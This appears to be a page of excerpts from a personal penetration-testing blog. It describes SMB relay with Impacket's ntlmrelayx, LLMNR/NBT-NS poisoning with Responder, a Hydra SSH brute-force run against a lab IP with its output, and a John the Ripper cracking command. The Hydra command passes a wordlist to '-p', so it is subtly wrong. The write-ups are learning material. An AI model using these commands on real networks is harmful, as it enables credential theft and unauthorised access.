MujereSec101

  #SMB Relay Attack Overview SMB is commonly used for sharing files, printers and communication between client and server. Before one can communicate with the other, the user will be required to authenticate themselves. This is simple access control. Although this control can help protect those important files, it can also be manipulated to allow authentication attempts to be relayed and used to access systems. It can also be abused in order to collect password hashes. This is where SMB relay comes into play. The attacker places themselves in the middle (MiTM) and relays the attempts. Once the end server has validated the credentials, the access is granted to the attacker instead of the user. What is SMB Relay Attack? A SMB relay attack is where an attacker captures a users NTLM hash and relays its to another machine on the network. Masquerading as the user and authenticating against SMB to gain shell or file access. Prerequisites SMB Signing disabled on target Must be on the local...

Ntlmrelayx.py is as python script that will simply relay NTLMv1/v2 hashes. Installing it is just straight forward on Kali Linux. Step 1:  Install the dependencies Ldapdomaindump is needed first, which can be installed by typing ┌──(root㉿kali)-[/home/kali/ActiveDirectory] └─# pip install ldap3 dnspython ┌──(root㉿kali)-[/home/kali/ActiveDirectory] └─# pip install ldapdomaindump Step 2: Once the dependencies are installed, download the impacket suite ┌──(root㉿kali)-[/home/kali/ActiveDirectory] └─# git clone https://github.com/CoreSecurity/impacket.git Once downloaded, go to the directory and install it ┌──(root㉿kali)-[/home/kali/ActiveDirectory/impacket] └─# python setup.py install And once installed, You can now run Impacket, run ntlmrelayx.py from any directory now. ┌──(root㉿kali)-[/home/kali/ActiveDirectory/impacket] └─# ntlmrelayx.py -tf target.txt -smb2support

In this write-up we will talk about LLMNR/NBT-NS Poisoning as this attack vector is still prevalent nowadays. Vast majority of assessments result in obtaining NTLMv1 and NTLMv2 hashes which can be taken advantage to crack these hashes and gain Administrator access. In our example, we will use the tool called "RESPONDER" to intercept traffics from the network and to gather these NTLMv1 and NTLMv2 hashes to our advantage then we will talk about the overview on how these attack's kind of work. LLMNR/NBT-NS Poisoning Overview Attackers can spoof an authoritative source for name resolution on a victim network by responding to LLMNR(UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. What is LLMNR? -Used to identify hosts when DNS fails to do so -Previously NBT-NS -Key flaw is that the services utilize a user's username and NTLMv2 h...

hydra -l user -p fasttrack.txt ssh://192.168.220.131 -V -I -F -t 40 ┌──(root㉿kali)-[/usr/share/wordlists] └─# hydra -l jeanpaul -p fasttrack.txt ssh://192.168.220.131 -V -I -F -t 4 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-07 00:31:22 [DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task [DATA] attacking ssh://192.168.220.131:22/ [ATTEMPT] target 192.168.220.131 - login "jeanpaul" - pass "fasttrack.txt" - 1 of 1 [child 0] (0/0) 1 of 1 target completed, 0 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-07 00:31:24 JohnTheRipper: john /tmp/hashes --wordlist /usr/share/wordlists/fasttrack.txt --format=crypt Password Store in Windows: NTDS.DIT, SAM file, Reg...